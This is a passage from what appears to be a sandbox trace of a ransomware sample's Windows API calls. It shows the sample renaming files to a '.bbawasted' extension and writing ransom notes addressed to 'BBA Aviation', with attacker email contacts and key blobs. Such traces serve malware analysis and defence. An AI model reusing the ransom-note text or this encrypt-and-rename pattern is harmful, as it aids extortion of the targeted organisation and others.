FOLLOWING KEY:\r\n[begin_key]kIrkF3iMhEneVncFEywh3GVWbryTepGNY7pUG8eU7YBLRap9I7foydwqmj5zjGYC\r\nfeJOZYBDC5rQp1gyrtB6MbmDtuFroE5ng/jY7vrMw0FdrVU3eD7Tyazf9mKk2W7p\r\ncOgFZGI2SREMHPxBefMeRCVI7c7Tjis6azWSCNiU0D2dRonU2pbBcnSXb+8hZemq\r\neApohHkyWDsLsLpDIJX1uy2XqzTE7iA8hsic7zPoCPEivp0FsxNbR8u8ZeP3BJb4\r\nOFWWy8+lLXBz5zbL5Oai40FBXfDDHy/abwgIA4U6vWvfmxTCgHv1UeoHaEwcZ7n/\r\nQL7p8r+dzJu5SpcmYIr+KebUAaFcEQZ5DMeb2OiTNTcYkTCdJB0HQlpZb3xCln1N\r\nRL7Er06R7ZZir352vt2Dm9qRaaeRMiXgELCc5knjcAya/kS85coH06pMZy1NXJX1\r\nPE+MgQK0YcSdXzn+U/Vy9hxaebXfNzmKnoGg2EwWLF7OS5/GedcHde1Eab26c2I1\r\nsgQUCrJdQedx2medfahlrkzqZHJl0Hq8TIxO5DLy0aJbbfYoOtgBIRe4RQIXn2tY\r\nm9g+QYLJ8361tJDV7PBDbjo7JRq53P3ICF1QJde8ZhNDyEKxGzhKGRJSlCA9nDRz\r\nXpyt0NTn3KhkFaIO6zDFild8khOe2M2kkRJVoArx//L=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.290] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0235.290] SetEndOfFile (hFile=0x28c) returned 1 [0235.392] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.392] CloseHandle (hObject=0x28c) returned 1 [0235.392] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0235.394] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1978 | out: hHeap=0x660000) returned 1 [0235.394] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5f98) returned 1 [0235.395] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0235.395] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0235.395] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm") returned 56 [0235.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0235.395] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.395] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6240) returned 1 [0235.396] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.396] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0235.396] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.396] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.398] SetEndOfFile (hFile=0x28c) returned 1 [0235.398] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.398] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm.bbawasted")) returned 1 [0235.399] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0235.399] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0235.399] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1133d [0235.400] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1133d) returned 0x600000 [0235.400] CloseHandle (hObject=0x294) returned 1 [0235.433] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0235.435] CloseHandle (hObject=0x27c) returned 1 [0235.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb88 [0235.435] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0235.436] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x6adbd0 | out: pbBuffer=0x6adbd0) returned 1 [0235.436] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0235.436] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6130) returned 1 [0235.437] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0235.437] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0235.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb88 | out: hHeap=0x660000) returned 1 [0235.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.449] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ET6jjoFsRokW6VHa4vGbrsg/xrq1LAU8iq9NQ2TN8sXb2BnRZ+ecm0DF3vAnM+pl\r\nya/IyPRrDbdbw/ja6/z07EvezZcaSb42scyEnhuhMhVEZeAOMrNhLo3vbhkPX6Ie\r\nr6gNHDY+uI/TPDpjDDuJleldheSD65fK00c4UoK3/qSmj53c16Nqy95gXh9ssYqn\r\nNnIQwNJ7pu5mgxcHUD6zdSJ+LOfC/ynlnk4CigpUDLrKfC8yl+5/r2xSmE/UsLm0\r\n/3h8kqRMSRx4/GgJsBwhuNvCMFpT7DOCPVy6DXXCphnMA81K0/jY6Poac02m9UDS\r\nMJiGaCRmKbqGgcQeR7GNmr0y/+iFeD6L13i8/XaC/YOvCEnFTBjTeV0K1FNew0z+\r\nyxzeQ8RS3ZTSu6TzUqpVcbf3KPrnWQGkzlqAzgTY+6CkR1zUEuuZRW7JxIB1ElYA\r\ns05soKcF89xuWyVr1vX9DUS9r6D2grpceotLO1fTvyZOGWinvnoB1i2i+FPvU09Y\r\nv0mQ64PIcGiwquE+lGO1JlzoanFF6OE5FwTBQYYmXQihjn2Rif6xQ+wpbmvT0qMB\r\nIerLK283cMlpcX1LuHa+B4+4Tgac+EU+Iccbq35YIX6nr97l+oGX9Vi7JWSWpcHy\r\njgptD3p70AxCd8eKVFvzcJgg42sxh6uWMQEDetOf1Ui=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.449] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0235.449] SetEndOfFile (hFile=0x28c) returned 1 [0235.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.452] CloseHandle (hObject=0x28c) returned 1 [0235.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0235.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1638 | out: hHeap=0x660000) returned 1 [0235.453] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0235.453] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0235.453] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0235.453] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm") returned 56 [0235.454] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0235.454] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.454] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.454] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a60a8) returned 1 [0235.455] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.455] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0235.455] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.455] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.457] SetEndOfFile (hFile=0x28c) returned 1 [0235.457] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.457] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.457] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm.bbawasted")) returned 1 [0235.459] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0235.459] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0235.459] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xe4b5 [0235.459] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe4b5) returned 0x5f0000 [0235.460] CloseHandle (hObject=0x27c) returned 1 [0235.529] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0235.530] CloseHandle (hObject=0x280) returned 1 [0235.530] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb88 [0235.530] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a68a0) returned 1 [0235.531] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x6adbd0 | out: pbBuffer=0x6adbd0) returned 1 [0235.531] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0235.531] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f98) returned 1 [0235.532] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0235.532] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0235.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb88 | out: hHeap=0x660000) returned 1 [0235.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.546] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]sqsUY6G+Xxoc7HwyxiMddnGDnHs98lkVymXONjUmYn1idOtpmwQ8g20PDz9Z5Fsi\r\nOgaGoAxrcIKbU/Coi+VgXDT1z/yMcJup5CyzAHCw6rU/+bl8LzKFv5hw4GcmSKH4\r\n/BKWGTxJOYVdCzQNmgPw8WytjAZE19+D/NxOpaozUEULjQWNEydu+mqY7zJFDn6M\r\nXG81OS9GaFJicMdzozu2IxyxmOfclwp7Qh/AO4l8mYOMvuAZTaGff3ivkAZlcLTL\r\nd/1rprBz31uBVO+bS9jFB1XMFNNfBg7ctvtzJL5RuE2bjMd0Ldso3DpC4ZrREqBi\r\nZK5SphFZkQvADZ2Rn6sD5GmjmFZYF3GTfVuzKQ+lqKffeQVd+OvbaWy6vVJ/K3Mo\r\njmZwyRpk4K8WzDryKG7USdLH//xScqihBe0jr2xijCJZC/K9LdnwjlFwalEMayT0\r\nQEF61egkWG1hz9xZBi+IKzw2FL7e1RFceZuIvsqd4OekgG2sDWS8lOXiBDmCOz92\r\n4p1XycMtOHCP1D5NgrVt9DH3y9zmiAL1JhMq9qNvLle2CsTve85OtFTnfdt2Sax6\r\n9NXIsoNdRk447qlSWdW8MVC1U6tVrAk4LcKG4Nr6lyBf/bRj8b1Z5Q5DM3EaePph\r\nZsJboE+WVI3N44ptElyPKvwkACAEVcPEw5OPUN4CLCA=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.546] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0235.547] SetEndOfFile (hFile=0x28c) returned 1 [0235.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.549] CloseHandle (hObject=0x28c) returned 1 [0235.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0235.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1a48 | out: hHeap=0x660000) returned 1 [0235.550] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6020) returned 1 [0235.550] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0235.550] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0235.550] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm") returned 56 [0235.550] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0235.551] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.551] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.551] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a65f8) returned 1 [0235.554] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.554] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0235.554] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.555] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.557] SetEndOfFile (hFile=0x28c) returned 1 [0235.557] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.557] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm.bbawasted")) returned 1 [0235.560] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0235.560] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0235.561] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xe4b5 [0235.561] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe4b5) returned 0x5f0000 [0235.561] CloseHandle (hObject=0x280) returned 1 [0235.674] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0235.675] CloseHandle (hObject=0x27c) returned 1 [0235.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0235.675] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6818) returned 1 [0235.676] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0235.676] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0235.676] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6350) returned 1 [0235.676] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0235.676] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0235.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0235.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.686] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]nu47qdLtZRA5YCGOxRUBYHEbCoO3HAgzfVcrv9a0gkAnTF4tjaqqBtgpQKJthjWa\r\nTMuB35bWQm4C64bzoJzmZdKum8ci8Vr3h28O7SBM6EXZNMoGwp0XaXQ9UlgHfq1d\r\nOlW6C2HHSbgGk+s7D1ZPdlTjKu/srYQj5qmeOhHty72dgAjqd/CewKOcTEE/HipK\r\n0hrmyYJd9vv6M18/H8PPuwf6WbuBCf2ObjGB7CntrOZ8HNYpSBVS7M97YRvyq1Np\r\n3ui9dXmKgT37Rr/xHYFrHFvCSFlpOKBc5GehtcoxQUolGT3lfW+AxmmLk4JSWRAD\r\nT2wkpcJX5PzAorrjX3nlaHmNjCpQlaxlfg1sa3aMfyt865SMmzH0e0Tej1/tB2Zn\r\nRENTz2Yr5r11zlCCRm85xuZC9gA/ZFPuAdslzV+AODpATif9755Ii12Li+yZqOxF\r\ny0JM+Dgx8WD16o+svcFD9b8qLubi0Qb3ce49DJLH7nZmm2r4O+b9bBbuCJRnZ/fU\r\ng74OsBhtyxvd6t5PB2EsbHvNMDI/93qBMwot3IzWXKWjJHbo27kQDT3aE3KcVlip\r\nAOcyHir4bAosQ9QuwFC++H35hijEOH6J6SI0zORi31Mglk4el5ULsA/KR3TkRaiM\r\nB+d9fqnSOAJuStd07UNPlRRE9ClQy3NnyvQZ9MRHbyl=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.686] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0235.686] SetEndOfFile (hFile=0x28c) returned 1 [0235.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.688] CloseHandle (hObject=0x28c) returned 1 [0235.688] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0235.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c18a8 | out: hHeap=0x660000) returned 1 [0235.689] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6350) returned 1 [0235.689] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0235.689] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0235.689] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm") returned 56 [0235.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0235.690] 